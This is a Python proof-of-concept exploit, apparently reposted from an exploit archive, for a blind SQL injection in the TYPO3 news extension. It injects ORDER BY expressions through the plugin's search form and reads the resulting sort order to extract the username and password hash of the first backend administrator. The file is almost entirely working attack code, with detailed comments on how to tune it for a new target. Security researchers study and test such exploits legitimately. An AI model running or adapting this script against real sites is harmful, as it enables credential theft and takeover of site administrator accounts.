  1. # Exploit Title: TYPO3 News Module SQL Injection
  2. # Vendor Homepage: https://typo3.org/extensions/repository/view/news
  3. # Exploit Author: Charles FOL
  4. # Contact: https://twitter.com/ambionics
  5. # Website: https://www.ambionics.io/blog/typo3-news-module-sqli
  6.  
  7.  
  8. #!/usr/bin/python3
  9.  
  10. # TYPO3 News Module SQL Injection Exploit
  11. # https://www.ambionics.io/blog/typo3-news-module-sqli
  12. # cf
  13. #
  14. # The injection algorithm is not optimized, this is just meant to be a POC.
  15. #
  16.  
  17. import requests
  18. import string
  19.  
  20.    
# A single Session is reused for every oracle request, so any cookies the
# target sets are carried along. All plain-HTTP traffic is routed through an
# intercepting proxy on localhost:8080 (Burp/ZAP style) for inspection.
# Caveats for anyone running this: if nothing is listening there, every
# request fails with requests' ProxyError before any injection happens, and
# only 'http' is proxied - an https:// URL would bypass the proxy entirely.
session = requests.Session()
session.proxies['http'] = 'localhost:8080'
  23.  
  24.  
# Target-specific knobs - change these for a new target.
#   URL:      the page rendering the news plugin list; no_cache=1 is kept on
#             the query string, presumably so a cached page never hides the
#             effect of the injected ORDER BY.
#   PATTERN0/PATTERN1: two strings from two different articles of that list.
#             test() compares the position of the *first* occurrence of each,
#             so pick strings whose first occurrence is unambiguous.
URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
PATTERN0 = 'Article #1'
PATTERN1 = 'Article #2'

# Alphabet used for the password column: letters, digits and '$', '.', '/',
# presumably to cover crypt-style salted hashes ("$1$...", "$P$...", "$2y$...").
# A character outside this set makes the extraction stop with ValueError.
FULL_CHARSET = ''.join([string.ascii_letters, string.digits, '$./'])
  31.  
  32.  
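def blind(field, table, condition, charset):
    """Extract ``field`` from the row of ``table`` selected by ``condition``.

    Two blind passes: the length of the value first, then the value itself
    one character at a time. ``charset`` is the alphabet tried for each
    character; blind_size raises ValueError as soon as a character is not in
    it. Returns the recovered value as a string.
    """
    # The length oracle only works through blind_size, which extracts a fixed
    # number of positions, so the length must be padded to a known digit
    # count. Adding 100 yields exactly three digits for lengths 0..899.
    # (The original "+9, two digits" trick covered lengths 1..90 only: a
    # longer value - e.g. a 60-char bcrypt hash is fine, but anything >90 -
    # was silently truncated, and an empty value raised, because the digit
    # count changed.)
    length_offset = 100
    length_digits = 3
    size = int(blind_size(
        'length(%s)+%d' % (field, length_offset), table, condition,
        length_digits, string.digits,
    )) - length_offset
    if size < 0:
        # Only reachable if the oracle returned garbage (e.g. a NULL column);
        # fail loudly instead of handing a negative size to blind_size.
        raise ValueError('Length oracle returned an impossible value: %d' % size)
    return blind_size(field, table, condition, size, charset)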
  58.  
  59.  
def select_position(field, table, condition, position, char):
    """Build the injected ORDER BY expression that tests one character.

    The expression evaluates to ``uid * 1`` when the character at ``position``
    (1-based, as in SQL substring()) of the selected value equals ``char`` and
    to ``uid * -1`` otherwise, i.e. it flips the sort direction of the listing;
    test() reads that flip back through the order of the two markers. The
    expression contains no whitespace at all - nesting is done with
    parentheses only - presumably so it survives whatever the plugin does to
    the order parameter.
    """
    subquery = 'select({})from({})where({})'.format(field, table, condition)
    char_code = 'ord(substring(({})from({})for(1)))'.format(subquery, position)
    sign = 'case(({})={})when(1)then(1)else(-1)end'.format(char_code, ord(char))
    return 'uid*({})'.format(sign)
  77.  
  78.  
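def blind_size(field, table, condition, size, charset):
    """Recover the first ``size`` characters of a value, one at a time.

    For each position every candidate in ``charset`` is tried in order until
    test() reports a match, so the cost is bounded by ``size * len(charset)``
    requests; putting likely characters first in ``charset`` speeds it up.
    The partial result is printed after every recovered character.

    Raises ValueError when no candidate matches at a position - wrong
    charset, a value shorter than ``size``, or a broken oracle.
    """
    # Collected in a list rather than via += on a str; also avoids naming the
    # local `string`, which shadowed the stdlib module in the original.
    recovered = []
    # SQL substring() positions are 1-based.
    for position in range(1, size + 1):
        for candidate in charset:
            payload = select_position(field, table, condition, position, candidate)
            if test(payload):
                recovered.append(candidate)
                print(''.join(recovered))
                break
        else:
            # Say where it failed and what was recovered so far: the partial
            # value is usually enough to tell a charset problem from an oracle
            # problem.
            raise ValueError(
                'Char was not found at position %d (recovered so far: %r)'
                % (position, ''.join(recovered))
            )
    return ''.join(recovered)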
  104.  
  105.  
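def test(payload, timeout=30):
    """Boolean oracle: send ``payload`` as the order expression and report the
    resulting sort direction.

    Returns True when PATTERN0 appears before PATTERN1 in the response body
    (the injected CASE evaluated to +1), False otherwise.

    ``timeout`` (seconds) bounds each request so a stalled target or proxy
    cannot hang the extraction forever.

    Raises ValueError if either marker is missing from the response - the
    page layout changed, the query errored, or a WAF/proxy served a different
    page. The original ``str.index`` raised the same ValueError with an
    unhelpful "substring not found", easy to mistake for a charset miss.
    """
    response = session.post(URL, data=data(payload), timeout=timeout)
    body = response.text
    first = body.find(PATTERN0)
    second = body.find(PATTERN1)
    if first < 0 or second < 0:
        raise ValueError(
            'Oracle markers not found in response (HTTP %d); check URL, '
            'PATTERN0/PATTERN1 and the proxy setting' % response.status_code
        )
    return first < second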
  119.  
def data(payload):
    """Return the POST body for the news plugin search form with ``payload``
    injected.

    The payload is sent both as the requested order and as the
    ``OrderByAllowed`` override; presumably the second field is what lets an
    attacker-supplied order expression pass the plugin's allow-list check
    (see the write-up linked in the header). The search fields just make the
    request look like an ordinary date-bounded search.
    """
    prefix = 'tx_news_pi1'
    form = {}
    form[prefix + '[overwriteDemand][order]'] = payload
    form[prefix + '[overwriteDemand][OrderByAllowed]'] = payload
    form[prefix + '[search][subject]'] = ''
    form[prefix + '[search][minimumDate]'] = '2016-01-01'
    form[prefix + '[search][maximumDate]'] = '2016-12-31'
    return form
  135.  
# Exploit: dump the credentials of the backend user with uid=1 from be_users.
# The username is only searched over ASCII letters; the password column holds
# a salted hash, hence the wider FULL_CHARSET. Every character costs up to
# len(charset) requests, so expect hundreds of requests per field.
print("USERNAME:", blind('username', 'be_users', 'uid=1', charset=string.ascii_letters))
print("PASSWORD:", blind('password', 'be_users', 'uid=1', charset=FULL_CHARSET))
  140.  
  141. #  0day.today [2017-04-27]  #